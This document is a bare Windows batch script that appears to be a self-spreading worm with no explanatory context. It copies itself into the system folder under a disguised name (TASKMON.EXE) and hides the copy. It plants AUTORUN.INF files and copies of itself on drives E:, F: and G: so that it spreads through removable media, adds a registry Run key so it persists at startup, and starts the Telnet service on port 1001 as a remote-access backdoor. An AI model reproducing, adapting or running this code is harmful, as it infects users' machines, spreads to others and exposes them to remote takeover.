@ECHO OFF
START EXPLORER.EXE %CD%
IF EXIST C:\WINDOWS\system32\TASKMON.EXE GOTO BEGIN
type %0 > "C:\WINDOWS\SYSTEM32\TASKMON.EXE"
ATTRIB C:\WINDOWS\SYSTEM32\TASKMON.EXE +s +h +r
GOTO END

:BEGIN
if exist E:\ goto E1
goto F
:E1
if exist E:\AUTORUN.INF goto F
ECHO [AUTORUN] > E:\AUTORUN.INF
ECHO Open=TASKMON.EXE >> E:\AUTORUN.INF
ECHO ShellExecute=TASKMON.EXE >> E:\AUTORUN.INF
ECHO Shell\Auto\Command=TASKMON.EXE >> E:\AUTORUN.INF
ECHO shell=Auto >> E:\AUTORUN.INF
ATTRIB E:\AUTORUN.INF +S +H +R
:F
if exist F:\ goto F1
goto G
:F1
if exist F:\AUTORUN.INF goto G
ECHO [AUTORUN] > F:\AUTORUN.INF
ECHO Open=TASKMON.EXE >> F:\AUTORUN.INF
ECHO ShellExecute=TASKMON.EXE >> F:\AUTORUN.INF
ECHO Shell\Auto\Command=TASKMON.EXE >> F:\AUTORUN.INF
ECHO shell=Auto >> F:\AUTORUN.INF
ATTRIB F:\AUTORUN.INF +S +H +R
:G
if exist G:\ goto G1
goto INF
:G1
if exist G:\AUTORUN.INF goto INF
ECHO [AUTORUN] > G:\AUTORUN.INF
ECHO Open=TASKMON.EXE >> G:\AUTORUN.INF
ECHO ShellExecute=TASKMON.EXE >> G:\AUTORUN.INF
ECHO Shell\Auto\Command=TASKMON.EXE >> G:\AUTORUN.INF
ECHO shell=Auto >> G:\AUTORUN.INF
ATTRIB G:\AUTORUN.INF +S +H +R
:INF
if exist E:\ goto INFE1
goto INFF
end
:INFE1
if exist E:\TASKMON.EXE goto INFF
type %0 > E:\TASKMON.EXE
ATTRIB E:\TASKMON.EXE +S +H +R
:INFF
if exist F:\ goto INFF1
goto INFG
end
:INFF1
if exist F:\TASKMON.EXE goto INFG
type %0 > F:\TASKMON.EXE
ATTRIB F:\TASKMON.EXE +S +H +R
:INFG
if exist G:\ goto INFG1
goto REG
end
:INFG1
if exist G:\TASKMON.EXE goto REG
type %0 > G:\TASKMON.EXE
ATTRIB G:\TASKMON.EXE +S +H +R
:REG
REG QUERY HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /v taskmon | FIND "taskmon"
IF NOT ERRORLEVEL 1 GOTO TLNT
REG ADD HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /v taskmon /t REG_SZ /d "C:\WINDOWS\SYSTEM32\TASKMON.EXE"
:TLNT
TLNTADMN | FIND "1001"
IF NOT ERRORLEVEL 1 GOTO ST_CHK
TLNTADMN CONFIG PORT= 1001
:ST_CHK
TLNTADMN | FIND "STARTED"
IF NOT ERRORLEVEL 1 GOTO BEGIN
SC CONFIG TlntSvr START= DEMAND
TLNTADMN START
GOTO BEGIN
:END
START C:\WINDOWS\SYSTEM32\TASKMON.EXE

